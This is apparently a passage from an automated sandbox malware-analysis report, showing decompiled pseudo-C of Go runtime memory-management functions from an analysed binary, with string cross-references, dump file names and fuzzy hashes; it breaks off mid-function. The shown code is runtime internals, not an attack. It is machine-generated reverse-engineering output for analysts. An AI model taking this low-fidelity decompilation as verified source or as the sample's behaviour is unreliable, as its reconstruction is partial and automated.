                                                                                                                            • Instruction Fuzzy Hash: 6341B362704E4046EF06EB62AC1976E6791F785BE1FA45121BE450BFAACF3CC4438768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01325CC0 Relevance: 6.4, Strings: 5, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E01325CC0(signed char __eax, void* __ebx, signed int __ecx, void* __edi, signed int __esi, signed long long __rax, signed long long __rbx, long long __rbp, signed long long __r10, void* __r11, void* __r13, void* __r14, void* __r15, signed long long _a8, signed long long _a16) {
				char _v8;
				signed int _v16;
				signed long long _v24;
				unsigned long long _v32;
				signed char _t51;
				void* _t54;
				void* _t55;
				void* _t73;
				signed int _t80;
				void* _t82;
				void* _t83;
				signed int _t84;
				void* _t86;
				void* _t91;
				signed long long _t102;
				signed long long _t116;
				unsigned long long _t123;
				unsigned long long _t124;
				long long _t128;
				signed long long _t130;
				signed long long _t131;
				intOrPtr _t133;
				signed long long _t136;
				unsigned long long _t138;
				signed long long _t141;
				signed long long _t143;
				unsigned long long _t144;
				signed long long _t145;
				void* _t153;
				unsigned long long _t158;
				long long _t161;
				unsigned long long _t162;
				intOrPtr _t163;
				signed long long _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				L0:
				while(1) {
					L0:
					_t168 = __r15;
					_t167 = __r14;
					_t166 = __r13;
					_t165 = __r11;
					_t164 = __r10;
					_t149 = __rbp;
					_t116 = __rbx;
					_t97 = __rax;
					_t84 = __esi;
					_t83 = __edi;
					_t73 = __ebx;
					_t51 = __eax;
					if(_t153 <=  *((intOrPtr*)(__r14 + 0x18))) {
						goto L23;
					}
					L1:
					_v8 = __rbp;
					_t149 =  &_v8;
					_t124 =  *((intOrPtr*)(__rax + 0x10078));
					_t144 = _t124 + 0;
					_t138 = _t144;
					_t143 = _t144 >> 0x16;
					asm("o16 nop [eax+eax]");
					if( *((intOrPtr*)(__rax + 0x10088)) <= _t143) {
						L19:
						__eflags = 0;
						return 0;
					} else {
						L2:
						_a16 = __rbx;
						_a8 = __rax;
						_t80 = __ecx & 0x003fffff;
						_t125 = _t124 >> 0xd;
						if(__rbx >  ~((_t124 >> 0xd) - 0x200)) {
							L11:
							_t54 = E01324F60(_t51, _t84, _t97, _t116, _t125, 0, _t138, _t149, _t164, _t167);
							__eflags = _t97;
							if(_t97 != 0) {
								L15:
								_t145 = _t97;
								_t130 = _t116;
								goto L16;
							} else {
								L12:
								__eflags = _a16 - 1;
								if(_a16 == 1) {
									_t128 =  *0x1465368; // 0x7fffffffffff
									 *((long long*)(_a8 + 0x10078)) = _t128;
								}
								__eflags = 0;
								return 0;
							}
						} else {
							L3:
							_t158 =  *((intOrPtr*)(__rax + 0x68));
							_t163 =  *((intOrPtr*)(__rax + 0x60));
							_t91 = _t158 - _t143;
							if(_t91 <= 0) {
								L22:
								_t97 = _t143;
								_t123 = _t158;
								E013588E0();
								goto L23;
							} else {
								L4:
								_t162 =  *((intOrPtr*)(_t163 + _t143 * 8));
								asm("dec ecx");
								if(_t91 >= 0) {
									_t158 = _t162 >> 0x15;
									r8d = r8d & 0x001fffff;
									__eflags = r8d;
								} else {
									r8d = 0x200000;
								}
								if(_t116 > _t158) {
									goto L11;
								} else {
									L8:
									_t141 = _t138 >> 0x23;
									if(_t141 >= 0x2000) {
										L21:
										E013588E0();
										goto L22;
									} else {
										L9:
										_v16 = _t143;
										_v32 = _t158;
										_t133 =  *((intOrPtr*)(_t97 + 0x78 + _t141 * 8));
										_t85 = _t84 & 0x00001fff;
										_t143 = _t143 << 7;
										_t134 = _t133 + _t143;
										_t102 = _t133 + _t143;
										_t54 = E01327860(_t51, _t82, _t84 & 0x00001fff, _t102, _t116, _t125, _t149, _t158, _t163, _t164, _t165, _t167);
										if(_t102 == 0xffffffff) {
											L20:
											E01332340(_t134, _t149, _t167);
											E01332C40(_t80, _t83, _t85, _t86, 0x1388606, _t116, _t149, _t167);
											E01332940(_t83, _t85, _t86, _v32, _t125, _t149, _t167);
											E01332C40(_t80, _t83, _t85, _t86, 0x138775c, _t116, _t149, _t167);
											E01332940(_t83, _t85, _t86, _a16, _t125, _t149, _t167);
											E013325A0(_t80, _t82, _t83, _t85, _t86, _t149, _t167);
											L013323C0(_t134, _t149, _t167);
											_v16 =  *((intOrPtr*)(_a8 + 0x10078));
											E01332340(_t134, _t149, _t167);
											E01332C40(_t80, _t83, _t85, _t86, 0x1389e03, _t116, _t149, _t167);
											__eflags = _v16 >> 0xd;
											E01332940(_t83, _t85, _t86, _v16 >> 0xd, _t125, _t149, _t167);
											E01332C40(_t80, _t83, _t85, _t86, 0x1388a21, _t116, _t149, _t167);
											L01332AA0(_t82, _t83, _t86, _v16, _t125, _t149, _t167);
											E013325A0(_t80, _t82, _t83, _t85, _t86, _t149, _t167);
											L013323C0(_t134, _t149, _t167);
											E01330BA0(0x1388850, _t116, _t149);
											goto L21;
										} else {
											L10:
											_t136 = _v16 << 0x16;
											_t145 = (_t102 << 0xd) + _t136 + 0;
											_t130 = _t136 + (_t116 << 0xd) + 0;
											L16:
											_v16 = _t145;
											_v24 = _t130;
											_t55 = E01324AC0(_t54, _t73, _t80, _t82, _t83, _a8, _t145, _a16, _t149, _t166, _t167, _t168);
											_t131 = _a8;
											_t161 = _v24;
											if(0 + _t161 >  *((intOrPtr*)(_t131 + 0x10078)) + 0) {
												 *((long long*)(_t131 + 0x10078)) = _t161;
											}
											return _t55;
										}
									}
								}
							}
						}
					}
					L24:
					L23:
					_a8 = _t97;
					_a16 = _t116;
					E0135A8C0(_t82, _t86, __eflags, _t116, _t123, _t143, _t149, _t158, _t163, _t164, _t165, _t166, _t168);
				}
			}









































                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc0
                                                                                                                            0x01325cc4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01325cca
                                                                                                                            0x01325cce
                                                                                                                            0x01325cd3
                                                                                                                            0x01325cda
                                                                                                                            0x01325ceb
                                                                                                                            0x01325cef
                                                                                                                            0x01325cf2
                                                                                                                            0x01325cf6
                                                                                                                            0x01325d07
                                                                                                                            0x01325e73
                                                                                                                            0x01325e73
                                                                                                                            0x01325e81
                                                                                                                            0x01325d0d
                                                                                                                            0x01325d0d
                                                                                                                            0x01325d0d
                                                                                                                            0x01325d12
                                                                                                                            0x01325d17
                                                                                                                            0x01325d1d
                                                                                                                            0x01325d2e
                                                                                                                            0x01325dd9
                                                                                                                            0x01325dd9
                                                                                                                            0x01325de0
                                                                                                                            0x01325de3
                                                                                                                            0x01325e12
                                                                                                                            0x01325e12
                                                                                                                            0x01325e15
                                                                                                                            0x00000000
                                                                                                                            0x01325de5
                                                                                                                            0x01325de5
                                                                                                                            0x01325dea
                                                                                                                            0x01325dee
                                                                                                                            0x01325df0
                                                                                                                            0x01325dfc
                                                                                                                            0x01325dfc
                                                                                                                            0x01325e03
                                                                                                                            0x01325e11
                                                                                                                            0x01325e11
                                                                                                                            0x01325d34
                                                                                                                            0x01325d34
                                                                                                                            0x01325d34
                                                                                                                            0x01325d38
                                                                                                                            0x01325d40
                                                                                                                            0x01325d43
                                                                                                                            0x01325f52
                                                                                                                            0x01325f52
                                                                                                                            0x01325f55
                                                                                                                            0x01325f58
                                                                                                                            0x00000000
                                                                                                                            0x01325d49
                                                                                                                            0x01325d49
                                                                                                                            0x01325d49
                                                                                                                            0x01325d4d
                                                                                                                            0x01325d52
                                                                                                                            0x01325d5c
                                                                                                                            0x01325d60
                                                                                                                            0x01325d60
                                                                                                                            0x01325d54
                                                                                                                            0x01325d54
                                                                                                                            0x01325d54
                                                                                                                            0x01325d6a
                                                                                                                            0x00000000
                                                                                                                            0x01325d6c
                                                                                                                            0x01325d6c
                                                                                                                            0x01325d6c
                                                                                                                            0x01325d77
                                                                                                                            0x01325f45
                                                                                                                            0x01325f4d
                                                                                                                            0x00000000
                                                                                                                            0x01325d7d
                                                                                                                            0x01325d7d
                                                                                                                            0x01325d7d
                                                                                                                            0x01325d82
                                                                                                                            0x01325d87
                                                                                                                            0x01325d8e
                                                                                                                            0x01325d94
                                                                                                                            0x01325d98
                                                                                                                            0x01325d9b
                                                                                                                            0x01325da0
                                                                                                                            0x01325da9
                                                                                                                            0x01325e82
                                                                                                                            0x01325e82
                                                                                                                            0x01325e93
                                                                                                                            0x01325ea0
                                                                                                                            0x01325eb1
                                                                                                                            0x01325ec0
                                                                                                                            0x01325ec5
                                                                                                                            0x01325eca
                                                                                                                            0x01325edb
                                                                                                                            0x01325ee0
                                                                                                                            0x01325ef1
                                                                                                                            0x01325f00
                                                                                                                            0x01325f04
                                                                                                                            0x01325f15
                                                                                                                            0x01325f20
                                                                                                                            0x01325f25
                                                                                                                            0x01325f2a
                                                                                                                            0x01325f40
                                                                                                                            0x00000000
                                                                                                                            0x01325daf
                                                                                                                            0x01325daf
                                                                                                                            0x01325db8
                                                                                                                            0x01325dca
                                                                                                                            0x01325dd4
                                                                                                                            0x01325e18
                                                                                                                            0x01325e18
                                                                                                                            0x01325e1d
                                                                                                                            0x01325e2f
                                                                                                                            0x01325e34
                                                                                                                            0x01325e4d
                                                                                                                            0x01325e58
                                                                                                                            0x01325e5a
                                                                                                                            0x01325e5a
                                                                                                                            0x01325e72
                                                                                                                            0x01325e72
                                                                                                                            0x01325da9
                                                                                                                            0x01325d77
                                                                                                                            0x01325d6a
                                                                                                                            0x01325d43
                                                                                                                            0x01325d2e
                                                                                                                            0x00000000
                                                                                                                            0x01325f5e
                                                                                                                            0x01325f5e
                                                                                                                            0x01325f63
                                                                                                                            0x01325f68
                                                                                                                            0x01325f72

                                                                                                                            Strings
                                                                                                                            • , npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos, xrefs: 01325EA5
                                                                                                                            • , p.searchAddr = : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North_ArabianOld_South_ArabianOther_ID_ContinueRegLoadMUIStringWSentence_TerminalSyste, xrefs: 01325F09
                                                                                                                            • bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje, xrefs: 01325F2F
                                                                                                                            • runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scaveng, xrefs: 01325E87
                                                                                                                            • runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWCon, xrefs: 01325EE5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: , npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos$, p.searchAddr = : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North_ArabianOld_South_ArabianOther_ID_ContinueRegLoadMUIStringWSentence_TerminalSyste$bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje$runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scaveng$runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWCon
                                                                                                                            • API String ID: 0-3280003337
                                                                                                                            • Opcode ID: 26622aed9197aa5101768b442896e11a3878e9660890fde9408d2a938f4529c8
                                                                                                                            • Instruction ID: cb0ce786f067c7fddb83f9a6899f071eb0f891e74fb8accbeb663af0f22ee438
                                                                                                                            • Opcode Fuzzy Hash: 26622aed9197aa5101768b442896e11a3878e9660890fde9408d2a938f4529c8
                                                                                                                            • Instruction Fuzzy Hash: DC51CF72724B9486DB10AB19E4403DEAB60F799BD8F584522DF9D03B69CF3CC685C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01351B00 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E01351B00(intOrPtr __ebx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rdx, void* __rdi, void* __rsi, long long __rbp, void* __r8, void* __r14, long long _a8, intOrPtr _a16) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _t31;
				void* _t34;
				void* _t36;
				intOrPtr _t53;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				long long _t74;
				long long _t87;
				intOrPtr _t93;
				long long _t94;
				void* _t98;
				void* _t99;
				void* _t104;
				void* _t109;
				void* _t110;

				L0:
				while(1) {
					L0:
					_t110 = __r14;
					_t109 = __r8;
					_t100 = __rbp;
					_t99 = __rsi;
					_t98 = __rdi;
					_t97 = __rdx;
					_t74 = __rax;
					_t65 = __esp;
					_t64 = __esi;
					_t63 = __edi;
					_t62 = __edx;
					_t53 = __ebx;
					if(_t104 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L18;
					}
					L1:
					_v8 = __rbp;
					_t100 =  &_v8;
					if(__ebx == 0xffffffff) {
						L3:
						return _t31;
					} else {
						L2:
						_t94 = 0x146a760;
						L5:
						while(_t94 != 0) {
							if( *((intOrPtr*)(_t94 + 0x118)) > _t74 ||  *((intOrPtr*)(_t94 + 0x120)) <= _t74) {
								L4:
								_t94 =  *((intOrPtr*)(_t94 + 0x220));
								continue;
							}
							L10:
							if(_t94 != 0) {
								L14:
								return E01347A60(_t53, _t62, _t63, _t64, _t65, _t94, _t94, _t100, _t109, _t110);
							} else {
								L11:
								_v48 = _t74;
								_a16 = _t53;
								0;
								_t34 = E01309600(0x147b660, _t97, _t100, _t110);
								_t93 =  *0x147b670; // 0x0
								_t61 = _a16;
								L0130D720(_t34, _a16, 0x137afc0, _t93, _t98, _t99, _t100, _t109, _t110);
								_t95 =  *0x137afc0;
								_v24 =  *0x137afc0;
								_t36 = E01309820(0x147b660, _t100, _t110);
								if(_v24 != 0) {
									L13:
									return _t36;
								} else {
									L12:
									E01332340(_t97, _t100, _t110);
									E01332C40(_t61, _t63, _t64, _t65, 0x1388c96, _t93, _t100, _t110);
									L01332AA0(_t62, _t63, _t65, _a16, _t95, _t100, _t110);
									E01332C40(_t61, _t63, _t64, _t65, 0x1386ba5, _t93, _t100, _t110);
									L01332AA0(_t62, _t63, _t65, _v48, _t95, _t100, _t110);
									E01332C40(_t61, _t63, _t64, _t65, 0x1388680, _t93, _t100, _t110);
									L013323C0(_t97, _t100, _t110);
									_t87 = 0x146a760;
									L16:
									while(_t87 != 0) {
										_v16 = _t87;
										_v32 =  *((intOrPtr*)(_t87 + 0x118));
										_t97 =  *((intOrPtr*)(_t87 + 0x120));
										_v40 =  *((intOrPtr*)(_t87 + 0x120));
										E01332340( *((intOrPtr*)(_t87 + 0x120)), _t100, _t110);
										E01332C40(_t61, _t63, _t64, _t65, 0x1386ea8, _t93, _t100, _t110);
										L01332AA0(_t62, _t63, _t65, _v32,  *((intOrPtr*)(_t87 + 0x118)), _t100, _t110);
										E01332C40(_t61, _t63, _t64, _t65, 0x1386f35, _t93, _t100, _t110);
										L01332AA0(_t62, _t63, _t65, _v40,  *((intOrPtr*)(_t87 + 0x118)), _t100, _t110);
										E013325A0(_t61, _t62, _t63, _t64, _t65, _t100, _t110);
										L013323C0( *((intOrPtr*)(_t87 + 0x120)), _t100, _t110);
										_t87 =  *((intOrPtr*)(_v16 + 0x220));
									}
									_t74 = 0x138e2a2;
									_t53 = 0x2e;
									E01330BA0(0x138e2a2, _t93, _t100);
									goto L18;
								}
							}
							goto L19;
						}
						goto L10;
					}
					L19:
					L18:
					_a8 = _t74;
					_a16 = _t53;
					E01356200(_t97, _t100);
				}
			}


























                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b00
                                                                                                                            0x01351b04
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01351b0a
                                                                                                                            0x01351b0e
                                                                                                                            0x01351b13
                                                                                                                            0x01351b1b
                                                                                                                            0x01351b26
                                                                                                                            0x01351b36
                                                                                                                            0x01351b1d
                                                                                                                            0x01351b1d
                                                                                                                            0x01351b1d
                                                                                                                            0x00000000
                                                                                                                            0x01351b40
                                                                                                                            0x01351b4c
                                                                                                                            0x01351b37
                                                                                                                            0x01351b37
                                                                                                                            0x00000000
                                                                                                                            0x01351b37
                                                                                                                            0x01351b60
                                                                                                                            0x01351b63
                                                                                                                            0x01351c31
                                                                                                                            0x01351c42
                                                                                                                            0x01351b69
                                                                                                                            0x01351b69
                                                                                                                            0x01351b69
                                                                                                                            0x01351b6e
                                                                                                                            0x01351b7c
                                                                                                                            0x01351b80
                                                                                                                            0x01351b85
                                                                                                                            0x01351b93
                                                                                                                            0x01351b97
                                                                                                                            0x01351b9c
                                                                                                                            0x01351b9f
                                                                                                                            0x01351bae
                                                                                                                            0x01351bbb
                                                                                                                            0x01351c27
                                                                                                                            0x01351c30
                                                                                                                            0x01351bc0
                                                                                                                            0x01351bc0
                                                                                                                            0x01351bc0
                                                                                                                            0x01351bd1
                                                                                                                            0x01351be0
                                                                                                                            0x01351bf1
                                                                                                                            0x01351c00
                                                                                                                            0x01351c11
                                                                                                                            0x01351c16
                                                                                                                            0x01351c1b
                                                                                                                            0x00000000
                                                                                                                            0x01351cc0
                                                                                                                            0x01351c43
                                                                                                                            0x01351c4f
                                                                                                                            0x01351c54
                                                                                                                            0x01351c5b
                                                                                                                            0x01351c60
                                                                                                                            0x01351c71
                                                                                                                            0x01351c80
                                                                                                                            0x01351c91
                                                                                                                            0x01351ca0
                                                                                                                            0x01351ca5
                                                                                                                            0x01351caa
                                                                                                                            0x01351cb4
                                                                                                                            0x01351cb4
                                                                                                                            0x01351cc9
                                                                                                                            0x01351cd0
                                                                                                                            0x01351cd5
                                                                                                                            0x00000000
                                                                                                                            0x01351cd5
                                                                                                                            0x01351bbb
                                                                                                                            0x00000000
                                                                                                                            0x01351b63
                                                                                                                            0x00000000
                                                                                                                            0x01351b59
                                                                                                                            0x00000000
                                                                                                                            0x01351cdb
                                                                                                                            0x01351cdb
                                                                                                                            0x01351ce0
                                                                                                                            0x01351ce4
                                                                                                                            0x01351cee

                                                                                                                            Strings
                                                                                                                            • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe, xrefs: 01351BE5
                                                                                                                            • runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread, xrefs: 01351BC5
                                                                                                                            • types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia, xrefs: 01351C65
                                                                                                                            • not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero, xrefs: 01351C05
                                                                                                                            • runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to , xrefs: 01351CC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe$ not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero$runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to $runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread
                                                                                                                            • API String ID: 0-2259351158
                                                                                                                            • Opcode ID: 939e3ed2f2ae1029682204e649d34b6957420f6e18e510e1a43cc452175afd04
                                                                                                                            • Instruction ID: 42ea8fd6a1c94064d04efc1b30258ca6edb5106e25186cf5a6146b3fa96091b5
                                                                                                                            • Opcode Fuzzy Hash: 939e3ed2f2ae1029682204e649d34b6957420f6e18e510e1a43cc452175afd04
                                                                                                                            • Instruction Fuzzy Hash: 70416932205B84CADB54AF58E4807AEBBA4F79AB98F845021EA8E03771DF38C545CB05
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01350C40 Relevance: 6.3, Strings: 5, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E01350C40(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rbx, long long __rcx, long long __rdi, long long __rbp, void* __r10, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24, long long _a32) {
				char _v8;
				long long _v16;
				long long _v24;
				char _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				long long _t67;
				void* _t73;
				void* _t90;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t104;
				long long _t105;
				long long _t110;
				char* _t112;
				void* _t114;
				long long _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				L0:
				while(1) {
					L0:
					_t120 = __r14;
					_t119 = __r11;
					_t118 = __r10;
					_t108 = __rdi;
					_t97 = __rcx;
					_t92 = __rbx;
					_t74 = __rax;
					_t63 = __esp;
					_t62 = __esi;
					_t61 = __edi;
					_t60 = __edx;
					_t59 = __ecx;
					if(_t114 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L10:
					_a8 = __rax;
					_a16 = __rbx;
					_a24 = __rcx;
					_a32 = __rdi;
					E01356200(_t104, __rbp);
				}
				L1:
				_v8 = __rbp;
				_t112 =  &_v8;
				_t105 =  *((intOrPtr*)(__rcx + 0x28));
				_t110 =  *((intOrPtr*)(__rcx + 0x30));
				if(_t110 == 0) {
					L5:
					_t117 = _t105;
				} else {
					if(_t110 >= _t105) {
						goto L5;
					} else {
						_t67 = _t110;
						_t117 = _t105;
						_t105 = _t110;
					}
				}
				_v40 = _t117;
				_v48 = _t110;
				_v56 = _t74;
				_v64 = _t92;
				_a32 = _t108;
				_a24 = _t97;
				_v80 = _t105;
				if(_t67 != 0 && _t110 > _t117) {
					_t117 = _t110;
				}
				_v72 = _t117;
